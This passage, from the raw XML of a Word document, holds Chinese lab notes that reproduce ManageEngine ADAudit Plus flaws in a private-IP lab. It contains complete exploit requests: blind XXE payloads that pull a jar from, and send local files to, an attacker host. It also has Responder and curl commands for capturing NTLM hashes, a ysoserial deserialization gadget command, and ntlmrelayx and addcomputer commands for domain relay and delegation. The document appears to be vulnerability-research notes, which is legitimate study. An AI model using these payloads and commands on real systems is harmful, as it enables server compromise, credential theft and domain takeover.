    <w:bookmarkStart w:name="ub0e1cb20" w:id="3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搭建一个域环境，将安装ADAP的机器提升为域控</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="312"/>
    <w:bookmarkStart w:name="u0a4ec440" w:id="3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端口：8081</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="313"/>
    <w:bookmarkStart w:name="Ufdmp" w:id="31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漏洞浮现</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="314"/>
    <w:bookmarkStart w:name="kzmtL" w:id="31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XXE(Blind xxe - 无回显xxe)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="315"/>
    <w:bookmarkStart w:name="uca98fe0b" w:id="3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根据web.xml找到路由触发点</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="316"/>
    <w:bookmarkStart w:name="u7c5959e9" w:id="3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/api/agent对应com.adventnet.sym.adsm.auditing.client.ember.api.ADAPAgentAPIServlet#processRequest函数进行API请求处理</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="317"/>
    <w:bookmarkStart w:name="u5cef06c0" w:id="3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跟进com.adventnet.sym.adsm.auditing.client.ember.api. RestAPIHandler#executeAgentRequest函数，通过正则匹配拿到com.adventnet.sym.adsm.auditing.webclient.ember.api.agent.AgentDataHandler#receiveData函数，然后执行Method.invoke进行动态调用</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="318"/>
    <w:bookmarkStart w:name="ubee71793" w:id="3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receiveData中通过读Body取json,body取不到就从header中拿json，然后转为一个hson数组jsonEventArray，如果是有效的json则交由com.adventnet.sym.adsm.auditing.server.EventDataAdapter#notify消息队列处理，把json数据放入到时间的消息队列中，当数据返回时，机会走入到时间的处理</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="319"/>
    <w:bookmarkStart w:name="u316fe11f" w:id="3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com.adventnet.sym.adsm.auditing.server.EventDataAdapter#run</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="320"/>
    <w:bookmarkStart w:name="u08486228" w:id="3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获取json传递数据的DomainName不为空则交ProcessMonitor.process继续处理json数据</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="321"/>
    <w:bookmarkStart w:name="ub253fc4d" w:id="3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json解析事件，如果domainname不为空，且输入正确，走入到ProcessMonitor.process(modData);处理</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="322"/>
    <w:bookmarkStart w:name="ud3c51aec" w:id="3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获取test.com(域)中的事件,事件内容不为空则调用com.adventnet.sym.adsm.auditing.server.ProcessMonitor#addEventRows处理</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="323"/>
    <w:bookmarkStart w:name="ubcc35d80" w:id="3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通过catgid获取事件类别监听器(Listener)，然后分发进入getEventRowList函数，id为11时，对应ProcessTrackingListener,进入ProcessTrackingListener对象，其调用getEventRow</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="324"/>
    <w:bookmarkStart w:name="u0e7e2be0" w:id="3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走进com.adventnet.sym.adsm.auditing.server.category.ProcessTrackingListener#getEventRow,其调用this.parseTaskContent(row, eventTbl);</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="325"/>
    <w:bookmarkStart w:name="u10b29765" w:id="3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parseTaskContent到xxe的点</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="326"/>
    <w:bookmarkStart w:name="u329defc1" w:id="3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来自eventTbl参数的Task Content或者Task New Content健值会造成xxe</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="327"/>
    <w:bookmarkStart w:name="c0d076b9" w:id="328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利用</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="328"/>
    <w:bookmarkStart w:name="481e034e" w:id="329"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5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文件上传</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="329"/>
    <w:bookmarkStart w:name="u5d258f30" w:id="330"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId6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https://github.com/pwntester/BlockingServer</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="330"/>
    <w:bookmarkStart w:name="940659f2" w:id="33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java BlockingServer 8089 123.ser</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="331"/>
    <w:bookmarkStart w:name="f9cb5660" w:id="33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POST /api/agent/tabs/agentData HTTP/1.1</w:t>
        <w:br/>
        <w:t>Host: 192.168.118.150:8081</w:t>
        <w:br/>
        <w:t>User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
        <w:br/>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</w:t>
        <w:br/>
        <w:t>Accept-Language: en-US,en;q=0.5</w:t>
        <w:br/>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
        <w:br/>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
        <w:br/>
        <w:t>Content-Length: 276</w:t>
        <w:br/>
        <w:t>Origin: http://192.168.118.150:8081</w:t>
        <w:br/>
        <w:t>Connection: close</w:t>
        <w:br/>
        <w:t>Referer: http://192.168.118.150:8081/</w:t>
        <w:br/>
        <w:t>Cookie: JSESSIONIDADAP=B0E7C61D5F577D4706B4F76F34E07BAE; adapcsrf=68a1d150715af87d74ceddb1a68baf26a3cefa80368a91ce267a727d86b86b3fc8060bb4e1a544d9824ba69fb67f9effa5f16501aaa7ef94531432f6e8090d57; _zcsr_tmp=68a1d150715af87d74ceddb1a68baf26a3cefa80368a91ce267a727d86b86b3fc8060bb4e1a544d9824ba69fb67f9effa5f16501aaa7ef94531432f6e8090d57; policy=open; authen=open; JSESSIONIDADAPSSO=055CDECDABB9E5D67F44CB223A644042; lowDis=open</w:t>
        <w:br/>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>[</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "DomainName":"test.com",</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "EventCode":4688,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "EventType":0,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "TimeGenerated":0,</w:t>
        <w:br/>
        <w:t xml:space="preserve"><![CDATA[        "Task Content":"<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [<!ENTITY ssrf SYSTEM \"jar:http://192.168.118.151:8089/cases.jar!/cs.txt\"> ]><foo>&ssrf;<?foo>"]]></w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>]</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="332"/>
    <w:bookmarkStart w:name="u2da37886" w:id="333"/>
    <w:bookmarkEnd w:id="333"/>
    <w:bookmarkStart w:name="u0d8b8717" w:id="3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注意：这个时候ftp服务端不要关，不然文件就被删除</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="334"/>
    <w:bookmarkStart w:name="1f084798" w:id="335"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading5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文件读取</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="335"/>
    <w:bookmarkStart w:name="u9f38595a" w:id="336"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId65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https://github.com/LandGrey/xxe-ftp-server</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="336"/>
    <w:bookmarkStart w:name="ub0233a61" w:id="337"/>
    <w:bookmarkEnd w:id="337"/>
    <w:bookmarkStart w:name="e39bb389" w:id="33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python xxe-ftp-server.py 192.168.118.151 9090 2121</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="338"/>
    <w:bookmarkStart w:name="udebbc228" w:id="3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exploit</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="339"/>
    <w:bookmarkStart w:name="f0281336" w:id="34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POST /api/agent/tabs/agentData HTTP/1.1</w:t>
        <w:br/>
        <w:t>Host: 192.168.118.150:8081</w:t>
        <w:br/>
        <w:t>User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
        <w:br/>
        <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8</w:t>
        <w:br/>
        <w:t>Accept-Language: en-US,en;q=0.5</w:t>
        <w:br/>
        <w:t>Accept-Encoding: gzip, deflate</w:t>
        <w:br/>
        <w:t>Referer: http://192.168.118.150:8081/</w:t>
        <w:br/>
        <w:t>Content-Type: application/json</w:t>
        <w:br/>
        <w:t>Content-Length: 355</w:t>
        <w:br/>
        <w:t>Origin: http://192.168.118.150:8081</w:t>
        <w:br/>
        <w:t>Connection: close</w:t>
        <w:br/>
        <w:t>Cookie: JSESSIONIDADAP=4F1964D9D5E00B0EC187A4449360ADC2; adapcsrf=68a1d150715af87d74ceddb1a68baf26a3cefa80368a91ce267a727d86b86b3fc8060bb4e1a544d9824ba69fb67f9effa5f16501aaa7ef94531432f6e8090d57; _zcsr_tmp=68a1d150715af87d74ceddb1a68baf26a3cefa80368a91ce267a727d86b86b3fc8060bb4e1a544d9824ba69fb67f9effa5f16501aaa7ef94531432f6e8090d57; policy=open; authen=open; lowDis=open</w:t>
        <w:br/>
        <w:t>Upgrade-Insecure-Requests: 1</w:t>
        <w:br/>
        <w:t>Cache-Control: max-age=0</w:t>
        <w:br/>
        <w:t/>
        <w:br/>
        <w:t>[</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "DomainName":"test.com",</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "EventCode":4688,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "EventType":0,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "TimeGenerated":0,</w:t>
        <w:br/>
        <w:t xml:space="preserve"><![CDATA[        "Task Content":"<?xml version=\"1.0\" encoding=\"UTF-8\"?> <!DOCTYPE data [<!ENTITY % file SYSTEM \"file:///C:/Users/Administrator/AppData/Local/Temp\"> <!ENTITY % dtd SYSTEM \"http://192.168.118.151:9090/data.dtd\"> %dtd;]><data>&send;</data>"]]></w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>]</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="340"/>
    <w:bookmarkStart w:name="kRX4m" w:id="34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XXE到SSRF到NTLM中继</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="341"/>
    <w:bookmarkStart w:name="ubf8b8b27" w:id="3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原理：当目标机器上的java程序发送http请求遇到状态码为401的HTTP返回头时，会判断该页面要求哪种认证方式，若攻击者回复要求采用NTLM认证则会自动使用当前用户凭据进行认证。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="342"/>
    <w:bookmarkStart w:name="ua7d8a3c5" w:id="3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在攻击机上运行响应器工具：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="343"/>
    <w:bookmarkStart w:name="f9f53a3a" w:id="34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python3 Responder.py -I eth0</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="344"/>
    <w:bookmarkStart w:name="ufbdce7d2" w:id="3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然后我们发送一个请求出发xxe并让ADAP服务器连接回攻击IP</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="345"/>
    <w:bookmarkStart w:name="1c4405b9" w:id="34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curl -X POST http://192.168.118.150:8081/api/agent/tabs/agentData -d @/home/echo/Desktop/payload_ntlm.json</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="346"/>
    <w:bookmarkStart w:name="uce1e807f" w:id="3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其中payload_ntlm.json为</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="347"/>
    <w:bookmarkStart w:name="ffcb7362" w:id="34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[</w:t>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "DomainName":"test.com",</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "EventCode":4688,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "EventType":0,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "TimeGenerated":0,</w:t>
        <w:br/>
        <w:t xml:space="preserve">        "Task Content":"&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt; &lt;!DOCTYPE foo [ &lt;!ENTITY % xxe SYSTEM \"http://192.168.118.151\"&gt; %xxe;]&gt;"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
        <w:br/>
        <w:t>]</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="348"/>
    <w:bookmarkStart w:name="u70e78ce7" w:id="3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Responder.py将捕获的NTLM保存在Responder.db</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="349"/>
    <w:bookmarkStart w:name="eff6e035" w:id="35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问题1：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="350"/>
    <w:bookmarkStart w:name="u2917f8b8" w:id="3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使用Responder中的multirelay.py脚本攻击受害机需要将SMB signing设置为Flase,而我的受害机为true</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="351"/>
    <w:bookmarkStart w:name="ube4e427c" w:id="3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关闭signing:</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="352"/>
    <w:bookmarkStart w:name="pOq7x" w:id="35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反序列化</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="353"/>
    <w:bookmarkStart w:name="ue01f7c44" w:id="3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在webapps\adap\WEB-INF\web.xml中找到CewolfServlet</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="354"/>
    <w:bookmarkStart w:name="udca418e8" w:id="3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CewolfRender#doGet函数为输入img并渲染内容，并调用了storage.getChartImage方法</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="355"/>
    <w:bookmarkStart w:name="ua2451995" w:id="3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Storage接口有多个实现类，de.laures.cewolf.storage.FileStorage的getChartImage函数执行反序列化操作</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="356"/>
    <w:bookmarkStart w:name="u5dd855fd" w:id="3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同时FileStorage#getFileName货物文件名并未对id参数做安全检查，其值可从Http请求img参数中直接获取</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="357"/>
    <w:bookmarkStart w:name="u7ad32481" w:id="3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使用ysoserial生成cb2链，成功弹出计算器</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="358"/>
    <w:bookmarkStart w:name="u70f41277" w:id="359"/>
    <w:p>
      <w:pPr>
        <w:spacing w:after="50" w:line="360" w:lineRule="auto" w:beforeLines="100"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId66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https://github.com/woodpecker-framework/ysoserial-for-woodpecker/releases/tag/0.5.2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:bookmarkEnd w:id="359"/>
    <w:bookmarkStart w:name="943d3514" w:id="36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java -jar ysoserial-for-woodpecker-0.5.2.jar -g CommonsBeanutils2 -a raw_cmd:"calc" &gt; 123.ser</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="360"/>
    <w:bookmarkStart w:name="zprRa" w:id="36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SMB中继</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="361"/>
    <w:bookmarkStart w:name="uce807d13" w:id="3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DC(adap服务)：192.168.118.150</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="362"/>
    <w:bookmarkStart w:name="u9e32ab28" w:id="3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kali:192.168.118.151</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="363"/>
    <w:bookmarkStart w:name="ua2084130" w:id="3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win2016:192.168.118.149</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="364"/>
    <w:bookmarkStart w:name="TNzJn" w:id="3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rpc回调中继</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="365"/>
    <w:bookmarkStart w:name="u4dfe6782" w:id="3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受害机：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="366"/>
    <w:bookmarkStart w:name="uba277663" w:id="3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win2016:192.168.118.150</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="367"/>
    <w:bookmarkStart w:name="uc741adac" w:id="3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win2012:192.168.118.153</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="368"/>
    <w:bookmarkStart w:name="u3013ef66" w:id="3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kali:192.168.118.151</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="369"/>
    <w:bookmarkStart w:name="uec48508b" w:id="3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windows2016回调失败</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="370"/>
    <w:bookmarkStart w:name="uc9e262c5" w:id="3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win2012回调成功</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="371"/>
    <w:bookmarkStart w:name="FDvUN" w:id="37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基于资源的约束委派</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="372"/>
    <w:bookmarkStart w:name="XEarb" w:id="37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添加机器账户</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="373"/>
    <w:bookmarkStart w:name="u8a46e239" w:id="3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1.有一个域账户</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="374"/>
    <w:bookmarkStart w:name="d61ad01f" w:id="37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python3 addcomputer.py -method SAMR -dc-ip 192.168.118.150 -computer-name adap -computer-pass 123456 "test.com/administrator:123Abc"</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="375"/>
    <w:bookmarkStart w:name="u96d3689a" w:id="3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2.域控开启ldaps服务情况下</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="376"/>
    <w:bookmarkStart w:name="cd0f0a79" w:id="37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sudo python3 ntlmrelayx.py -ip 0.0.0.0 -t ldaps://192.168.118.150 --add-computer</w:t>
        <w:br/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="377"/>
    <w:bookmarkStart w:name="ud7c51652" w:id="378"/>
    <w:bookmarkEnd w:id="378"/>
    <w:bookmarkStart w:name="u3470e835" w:id="3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未成功。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="379"/>
    <w:bookmarkStart w:name="u1b1ac920" w:id="3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</w:p>
    <w:bookmarkEnd w:id="380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o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml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https://cert.360.cn/report/detail?id=0de94a3cd4c71debe397e2c1a036436f" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId12" Target="https://github.com/Lighird/CVE-2018-2628" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink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https://ares-x.com/tools/runtime-exec/" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink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https://www.yuque.com/litanran/vdphgl/hqdnnd#Dpfkp" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId24" Target="https://www.yuque.com/litanran/wogrt5/qnszyxfi0k8z" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId25" Target="https://msrc.microsoft.com/update-guide/vulnerability" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId26" Target="https://jishuin.proginn.com/p/763bfbd5ac72" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId27" Target="https://saucer-man.com/information_security/748.html#cl-1" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId28" Target="https://xz.aliyun.com/t/10098" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId29" Target="https://half90.top/2021/08/30/cve-2021-26855-proxylogon-fu-xian/#toc-heading-5" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId3" Target="numbering.xml" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering"/><Relationship Id="rId30" Target="https://docs.microsoft.com/zh-cn/exchange/plan-and-deploy/prerequisites?view=exchserver-2016%EF%BC%89" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId31" Target="https://download.visualstudio.microsoft.com/download/pr/014120d7-d689-4305-befd-3cb711108212/0fd66638cde16859462a6243a4629a50/ndp48-x86-x64-allos-enu.exe" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId32" Target="https://www.microsoft.com/en-us/download/details.aspx?id=30679" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId33" Target="https://support.microsoft.com/zh-cn/topic/update-for-visual-c-2013-redistributable-package-d8ccd6a5-4e26-c290-517b-8da6cfdf4f10" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId34" Target="https://download.microsoft.com/download/d/2/3/d23b113b-9634-4456-acba-1f7b0ce22b0e/ExchangeServer2016-x64-cu18.iso" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink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https://github.com/herwonowr/exprolog" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId38" Target="media/document_image_rId38.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId39" Target="https://baike.baidu.com/item/%E5%9F%9F%E5%90%8D" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId4" Target="https://so.csdn.net/so/search?q=xml&amp;spm=1001.2101.3001.7020" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId40" Target="https://baike.baidu.com/item/%E5%9F%9F%E5%90%8D%E7%B3%BB%E7%BB%9F" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink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https://lhl7.github.io/2022/03/26/CVE-2020-16875%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId48" Target="https://www.anquanke.com/post/id/219091" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId49" Target="media/document_image_rId49.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId5" Target="media/document_image_rId5.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId50" Target="media/document_image_rId50.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId51" Target="media/document_image_rId51.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId52" Target="media/document_image_rId52.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId53" Target="media/document_image_rId53.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId54" Target="media/document_image_rId54.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId55" Target="https://lhl7.github.io/2022/03/26/Metasploit%E7%9A%84%E4%BD%BF%E7%94%A8%E7%AC%94%E8%AE%B0/" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId56" Target="https://fdlucifer.github.io/2020/10/12/cve-2020-0688/" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId57" Target="https://www.cnblogs.com/nice0e3/p/15758903.html" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId58" Target="https://github.com/Jumbo-WJB/CVE-2020-0688" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId59" Target="media/document_image_rId59.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId6" Target="https://so.csdn.net/so/search?q=xml&amp;spm=1001.2101.3001.7020" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId60" Target="media/document_image_rId60.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId61" Target="https://github.com/pwntester/ysoserial.net/releases" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId62" Target="media/document_image_rId62.png" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"/><Relationship Id="rId63" Target="https://archives2.manageengine.com/active-directory-audit/7055/Manageengine_ADAudit_Plus_x64.exe" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId64" Target="https://github.com/pwntester/BlockingServer" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId65" Target="https://github.com/LandGrey/xxe-ftp-server" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/><Relationship Id="rId66" Target="https://github.com/woodpecker-framework/ysoserial-for-woodpecker/releases/tag/0.5.2" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink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